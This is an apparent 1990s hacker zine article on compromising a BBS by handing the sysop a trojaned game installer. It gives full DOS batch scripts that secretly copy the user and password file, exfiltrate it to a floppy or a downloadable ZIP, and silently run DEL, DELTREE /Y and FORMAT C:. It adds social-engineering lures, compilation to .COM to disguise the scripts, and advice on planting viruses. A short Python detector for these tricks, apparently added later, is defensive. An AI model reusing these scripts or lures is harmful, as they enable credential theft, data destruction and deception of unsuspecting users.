Hacking a BBS with DOS
by Section8
This article is not about dialing up your local BBS and entering a magical code that drops you to DOS. It doesn't have anything to do with modem settings, secret passwords, or built-in back doors. The problem with all of these methods of hacking is that once they are discovered, they are usually pretty easy to protect against.
To start things off, you need to find a BBS to practice on before you move on to the big dogs. I like to prey on newly started boards, or boards run by confirmed idiots. I like the idiot boards because they almost always install all the software using the default directories, or they'll at least use directory structures that are easy to guess.
Once you have found the particular board that you're going to hack, get yourself a copy of the same BBS software that your victim is using. You can usually find this on the same board for download, or on another local board. You can also find just about any BBS software around on the Internet.
Install the software on your own computer, using all the defaults for directory and file structure. Write down the directory structure, including the sub-directories that hold all the downloads, message base data, and the user info. You'll also need to find out which file(s) hold the listing for users and passwords.
Now you need to find a copy of some software that your victim will run on his computer. The type of software won't matter as long as it's something your victim will want to try out. Some examples are cool online games, BBS utilities and add-ons, regular games, demo games, shareware, etc. You could also let the guy think he's a really cool pirate and let him snag some boss 0-day warez or registered copies of cool software. For a surefire hook-in-mouth reaction, my personal favorite is X-rated software with catchy titles. I have never failed to get results this way, no matter how prudish the victims seem. I guess America is more perverted than I thought.
Once you have selected the perfect software, you'll need to make a few minor modifications before you let the sysop have it. The modifications you make will depend on your method of delivery, or how you give the shit to the victim. The preferred method is to personally give him the installation disks. That way he'll have to give you the disks back when he is done. Other ways are usually done by uploading the game to his BBS or by putting it up on another board that he frequents and having him accidentally stumble across it. We'll cover each approach separately in a moment, but first I need to discuss some often overlooked but highly powerful batch file commands.
That's right, we're going to be writing batch files that will help us abuse the victim's bulletin board, pillage files and information, and leave his lame BBS in a pile of burning ruin. Take a look at the lines below and their functions.
This will be the first line of your batch file. It helps to keep your victim from seeing what's happening as the file is running.
IF EXIST C:\BBS\DATA\USERLIST.DAT GOTO HELL
This line checks to see if the specified directory and file exist. If they do, the program jumps forward to a subroutine entitled :HELL. If not, then it executes the next line in the program.
ECHO Y | DEL C:\WINDOWS\*.* > NUL
The DEL C:\WINDOWS\*.* will delete all the files in the WINDOWS directory. The only problem is that DEL *.* asks the user for a Y/N response (Are you sure you want to delete this shit?). But the ECHO Y | gives the Y response for us and proceeds without ever asking our victim if he agrees with our decision. The > NUL sends all the output from the file to a trash dumpster called NUL, rather than printing it to the screen. This way the user sees only the words we want him to see.
DELTREE /Y C:\GAMES > NUL
Normally, DELTREE requires a Y/N response to proceed. But unlike the DEL command, the ECHO Y | thing doesn't work. So what we do is tack the /Y thing on the end which disables user prompting for the DELTREE command. Now we delete his entire GAMES directory and all the subdirectories. Again, the > NUL keeps any of this information from being displayed on the screen.
TYPE C:\BBS\DATA\PASSWORD.LST > A:\FILE001.DAT
This writes the contents of the PASSWORD.LST file to drive A: and calls it FILE001.DAT to keep it from drawing much attention. People don't pay much attention to .DAT files. You could also use COPY in this particular instance.
ECHO Y | FORMAT C: > NUL
This formats the asshole's hard drive without him having a clue that it's happening.
ECHO Y | FORMAT C: /Q /U > NUL
I haven't actually tried this because I just thought of it but I'm pretty sure it will work. It formats the C: drive as before, but the /Q /U parameters should make it a quick unconditional format, and no unformat information is kept. I know this works on floppies, but I haven't tried it on a hard drive yet. Let me know if it works.
TREE > A:\FILE001.DAT
This copies a listing of the directory structure of the hard drive to the disk in A: and calls it FILE001.DAT. This can be very useful information for future hacking excursions on the guy's computer.
DIR /S ASSHOLE.TXT > A:\FILE001.DAT
This searches for a file named ASSHOLE.TXT. When it finds the file, it records the location of the file on drive A:. If you are looking for the password file but don't know which directory the guy has it in, this is a good way of finding out where it is.
:HELL
This just defines a subroutine called HELL.
These are just a few powerful commands, and you'll soon see how they can bring a bulletin board to its knees. For the examples to follow, we'll assume that the BBS in question possesses the following traits:
- The main BBS directory is C:\BBS
- Files available for download are located at C:\BBS\DLOADS
- There is a file available for download called USURPER.ZIP
- Usernames and passwords are kept in C:\BBS\DATA\USERS.DAT
- The BBS is very lame.
- The program we are going to give to the sysop is the game Doom.
Chances are that you don't have the original disks so we'll say they are copies or ZIP files that you will upload. Also, everyone has had Doom for years now, so you will need to use something newer that people aren't as familiar with and something that the victim doesn't have yet. I'm just using it for an example.
Our first scenario is the most desirable. You are friends with the sysop or you at least know him and will be able to physically hand him the disks or have a mutual friend give him the disks.
On the first Doom disk, rename the INSTALL.EXE program to FILE001.DAT so it will look as if it belongs there. Then, create a file named INSTALL.BAT.
When the batch file is run on the victim's computer, it should first grab a copy of the file that contains the user and password listings, if you know where it is located. You then want to get a copy of his directory structure and then finally rename a couple of files and run Doom. It is very important to actually run the software, whatever it is, to keep your mark from becoming suspicious.
Here is an example of a file that would accomplish this:
COPY C:\BBS\DATA\USERS.DAT A:\FILE002.DAT > NUL
TREE C:\ > A:\FILE003.DAT
DIR /S USERS.DAT > A:\FILE004.DAT
REN FILE001.DAT INSTALL.EXE
INSTALL.EXE
This file grabs all the info we need, renames INSTALL.EXE, and runs install. Remember that install had been changed to FILE001.DAT so we are just changing it back. Now use BAT2EXEC to compile this batch file to .COM format to make everything look authentic. BAT2EXEC can usually be downloaded from a zillion places via the Internet. Look for a good DOS utilities site.
Now all you need to do is get the disks back. You should see your files on the disk now: FILE002.DAT and FILE003.DAT which are the USERS.DAT and tree files, and FILE004.DAT which shows where the USERS.DAT file is. Copy the USERS.DAT file into your own BBS directory and you're ready to go. Now you should be able to get all the user login names and passwords. I'm confident that you'll know what to do with this information. Also, sysops and co-sysops usually have an extra password which is used for functions such as "Drop To DOS." You should also make sure to get these passwords.
If for some reason you don't have FILE002.DAT, then you listed the wrong directory and/or filename for the USERS.DAT file. Look at FILE003.DAT and FILE004.DAT and see where you went wrong.
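Seen from the sysop's side, the install-disk trick described above leaves two checkable traces: a batch file that silences its output, redirects listings to files and renames a data file to an executable, and a .DAT file that is really a program. The Python check below is an added example, not part of the original article; the rule labels, function names, extension list and sample input are this example's own assumptions.

```python
import re

# Patterns taken from the batch tricks described in this article.
# Rule labels are this example's own, not any product's signatures.
RULES = [
    ("auto-confirm", re.compile(r"ECHO\s+Y\s*\|\s*(DEL|ERASE|FORMAT)\b", re.I)),
    ("deltree-noprompt", re.compile(r"\bDELTREE\s+/Y\b", re.I)),
    ("silenced", re.compile(r">\s*NUL\b", re.I)),
    ("listing-to-file",
     re.compile(r"^\s*(TYPE|TREE|DIR)\b.*>\s*(?!NUL\b)\S+", re.I)),
    ("rename-to-exe",
     re.compile(r"^\s*REN(AME)?\s+\S+\s+\S+\.(EXE|COM|BAT)\b", re.I)),
]

# Extensions that normally carry an MZ header (assumed list, extend as needed).
EXECUTABLE_EXTS = {"EXE", "DLL", "DRV", "OVL"}


def scan_batch(text):
    """Return (line_number, rule_label) for every suspicious line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            if pattern.search(line):
                findings.append((number, label))
    return findings


def disguised_executable(filename, first_bytes):
    """True when a file starts with the DOS EXE magic but hides its extension."""
    ext = filename.rsplit(".", 1)[-1].upper() if "." in filename else ""
    return first_bytes[:2] == b"MZ" and ext not in EXECUTABLE_EXTS


# Constructed sample modelled on the INSTALL.BAT shown above,
# plus one of the auto-confirmed deletes from the command list.
SAMPLE_BAT = r"""COPY C:\BBS\DATA\USERS.DAT A:\FILE002.DAT > NUL
TREE C:\ > A:\FILE003.DAT
ECHO Y | DEL C:\GAMES\*.* > NUL
REN FILE001.DAT INSTALL.EXE
INSTALL.EXE
"""

if __name__ == "__main__":
    for number, label in scan_batch(SAMPLE_BAT):
        print(f"line {number}: {label}")
    print(disguised_executable("FILE001.DAT", b"MZ\x90\x00"))
```

scan_batch only reads plain-text batch files; once the batch has been compiled to .COM as the article suggests, the header check on the files sitting next to the installer is the part that still applies.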
For our next scenario, we'll be uploading the software to his BBS. Things are basically the same, but now we have to make a few additions to our batch file.
We can't copy anything to the A: drive now, so we're going to use a file on his computer as a substitute for a floppy disk. We'll make it a file that is available for download so we can retrieve it at our convenience. Also, if you're not sure what the directory structure is or where the files are located, you can use IF EXIST along with some subroutines to better your odds. Try substituting different names for the directories and files. As long as you have the directory where the downloads are, you can just get the tree info and DIR /S and come back for the other shit later when you know where it's at.
Here's a sample file:
@ECHO OFF
IF EXIST C:\BBS\DLOADS\*.* GOTO HELL
GOTO END
:HELL
DIR /S USERS.DAT > A.TXT
TREE C:\ > B.TXT
COPY A.TXT + B.TXT + C:\BBS\DATA\USERS.DAT C:\BBS\DLOADS\USURPER.ZIP > NUL
DEL A.TXT > NUL
DEL B.TXT > NUL
:END
REN FILE001.DAT INSTALL.EXE
INSTALL.EXE
The file turns echoing off, then checks to see if the C:\BBS\DLOADS directory exists. You can't just check for the directory, so you use *.* to see if there are any files there. If there are, then you know the directory exists. If it does exist then the program jumps to the :HELL subroutine. If not, the program renames the install file, runs it and ends. You can add a few more levels into the program to check for other suspected directories if you wish.
If the DLOADS directory does exist, the program creates a textfile A.TXT which contains the location of USERS.DAT and B.TXT which contains the directory tree. Then it combines these two files together with USERS.DAT and copies them over to the DLOADS directory, replacing USURPER.ZIP and then proceeds to rename and run the install program.
Some of this may seem redundant, like why would you need to know where USERS.DAT is if you already copied the file. Well you really don't, but suppose after everything is done you don't have the USERS.DAT file because it wasn't where you thought it was, or it was renamed. Now you'll be able to tell exactly where it is if it exists, and if it doesn't exist then you'll at least know some good places to look for it, even if it has been renamed.
Either way, after all this happens, all you need to do is call up the board and download the USURPER.ZIP file and it will contain the three files. Cut out the DIR /S part and the TREE info and you are left with USERS.DAT. Rename the file as USERS.DAT and copy it into your BBS directory in the appropriate place. Now you'll have everyone's username and password.
The last scenario I'll cover deals with stealth uploading. This is for when you want the guy to download your altered program without tracing it back to you or suspecting any foul play. You do the same thing with the file as before, but instead of uploading it to his BBS, you put it in your own BBS as available for download, or upload it to another BBS that he frequents. You might even leave a message about the file in the message bases so he'll be sure to find it.
If he uses the Internet, and you know where to find his Internet software, you can also get a copy of the files that show the spots on the Internet that he frequents. Like if he uses Netscape, which most people do, you can grab a listing of his sites and maybe upload more killer files to his favorite Internet site.
As far as destruction, I'll leave that up to you. I showed you earlier how to use the DEL *.*, DELTREE, and FORMAT commands to destroy things. I don't do much destruction unless the guy's a narc or a real asshole, but when I do, there are several ways I go about it.
1.) Only delete certain key files that he won't notice for a while. These files could be UNDELETE, UNFORMAT, some Windows drivers, drivers and data files for particular applications, anti-virus software, etc., etc. I also like to add virii when I do this.
2.) Delete entire trees of things. My favorite is to DELTREE the games directory. Almost everyone has a C:\GAMES directory and it seems like the only reason most shits even buy a computer is to play games, so hit 'em where it hurts. Worst case scenario is that they spend hours reloading the games, begging friends to re-borrow the pirated games, and all their save-games are lost so now they have to start all over again.
3.) Format the entire f*cking hard drive. Check for other hard drives on the system and format them too. I like to add little ANSI or graphics that say reassuring shit like "Loading... Please Wait..." or "Please be patient, this will take a few minutes..." and after the format is complete you can opt to show the guy an ANSI of a severed dick and balls along with a little message to the tune of "Not only are you a lame asshole, but now you're fucked as well!!!"
4.) Load new copies of the CONFIG.SYS and AUTOEXEC.BAT for him so nothing will work right and all his memory gets sucked down the drain. If the guy doesn't know shit about computers, he'll be screwed until one of his cheesy butt-buddies helps him set things up again.
Just a few suggestions, but I'm sure you'll do fine by yourself. Don't forget to change your batch files to .COM files with BAT2EXEC.
Also, I'm not sure how to do this with a batch file, but it would be nice to do something like a DIR /S to find the directory where a certain file is located, and then go to that directory and copy the file in question to the A: drive or wherever you want it to go. If you know a way to do this in a batch file, let me know.
Some other ideas are to use choice and some menu commands to recreate a front-end for the install program. The front-end asks the user to enter the directories he uses for his BBS as well as the name and location of his user data file and password list. Then it uses this info for everything and does it automatically. A bit more difficult to do, but much more effective. This should only be used with BBS applications to avoid raising suspicion.